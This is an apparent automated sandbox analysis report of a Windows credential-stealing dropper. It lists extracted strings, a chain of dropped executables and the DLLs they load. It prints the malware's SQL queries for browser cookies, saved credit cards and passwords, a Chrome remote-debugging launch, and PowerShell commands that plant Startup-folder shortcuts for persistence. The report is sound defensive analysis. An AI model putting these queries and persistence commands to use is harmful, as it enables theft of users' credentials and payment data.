                    Source: file.exe, file.exe, 00000000.00000002.1980445357.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972584354.000000001D4CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: 309de20225.exe, 00000018.00000002.2626496741.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookiest;
                    Source: softokn3[1].dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                    Source: file.exe, 00000000.00000002.1980445357.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972584354.000000001D4CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: softokn3[1].dll.0.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                    Source: softokn3[1].dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: file.exe, 00000000.00000002.1958471071.00000000009CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT url FROM urls LIMIT 1000;
                    Source: file.exe, 00000000.00000002.1980445357.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972584354.000000001D4CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: file.exe, 00000000.00000002.1980445357.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972584354.000000001D4CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: 309de20225.exe, 00000018.00000002.2626496741.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies&;
                    Source: file.exe, 00000000.00000002.1980445357.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972584354.000000001D4CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: file.exe, 00000000.00000002.1980445357.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972584354.000000001D4CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: softokn3[1].dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: softokn3[1].dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: softokn3[1].dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: file.exe, 00000000.00000002.1980445357.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972584354.000000001D4CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                    Source: file.exe, 00000000.00000002.1980445357.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972584354.000000001D4CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: softokn3[1].dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: file.exe, 00000000.00000003.1841422800.000000001D3A9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569975915.0000000005781000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: file.exe, 00000000.00000002.1980445357.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972584354.000000001D4CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: 309de20225.exe, 00000018.00000002.2626496741.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cardsp;
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2348,i,5535902685194765974,17004954160592938984,262144 /prefetch:8
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsDGHCBAAEHC.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\DocumentsDGHCBAAEHC.exe "C:\Users\user\DocumentsDGHCBAAEHC.exe"
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe "C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe "C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeProcess created: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe "C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeProcess created: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe "C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 320
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe "C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe "C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe "C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fvgp.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe "C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe "C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe "C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe "C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe "C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsDGHCBAAEHC.exe"Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2348,i,5535902685194765974,17004954160592938984,262144 /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\DocumentsDGHCBAAEHC.exe "C:\Users\user\DocumentsDGHCBAAEHC.exe" Jump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe "C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe "C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe "C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe "C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe "C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeProcess created: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe "C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeProcess created: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe "C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fvgp.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()"
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mozglue.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: d3d9.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeSection loaded: dwmapi.dllJump to behavior
